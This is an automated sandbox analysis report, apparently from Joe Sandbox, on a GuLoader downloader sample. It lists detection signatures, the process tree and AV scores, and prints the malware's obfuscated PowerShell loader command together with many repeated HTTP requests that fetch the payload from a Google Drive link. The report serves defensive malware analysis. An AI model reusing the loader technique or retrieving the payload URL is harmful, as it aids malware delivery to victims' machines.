Windows Analysis Report
LMSxhK1u8Z.exe

Overview

General Information

Sample name: LMSxhK1u8Z.exe (renamed because original name is a hash value)
Original sample name: fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2.exe
Analysis ID: 1588662
MD5: f2827f013a265de94993c62bf9756b00
SHA1: 9cc4cc403434e08c9c2e2ab312980cad6b2470ca
SHA256: fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2
Tags: exe, GuLoader, signed, user-adrian__luca

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LMSxhK1u8Z.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\LMSxhK1u8Z.exe" MD5: F2827F013A265DE94993C62BF9756B00)
    • powershell.exe (PID: 7360 cmdline: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Calcifuge.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\Calcifuge.exe" MD5: F2827F013A265DE94993C62BF9756B00)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2918084212.0000000001805000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000001.00000002.2002927074.0000000009A85000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" , CommandLine: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LMSxhK1u8Z.exe", ParentImage: C:\Users\user\Desktop\LMSxhK1u8Z.exe, ParentProcessId: 7284, ParentProcessName: LMSxhK1u8Z.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" , ProcessId: 7360, ProcessName: powershell.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-01-11T03:52:30.599048+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 172.217.16.206 | 443 | TCP


      AV Detection

      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exe, ReversingLabs: Detection: 57%
      Source: LMSxhK1u8Z.exe, Virustotal: Detection: 72%
      Source: LMSxhK1u8Z.exe, ReversingLabs: Detection: 57%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
      Source: LMSxhK1u8Z.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: Binary string: stem.Core.pdb@8 source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2000880429.0000000008AA9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.1985666150.00000000033A5000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe, Code function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe, Code function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exe, Code function: 0_2_00402706 FindFirstFileW,0_2_00402706
      Source: global traffic, TCP traffic: 192.168.2.4:53456 -> 162.159.36.2:53
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.16.206:443
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache | Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global traffic, HTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
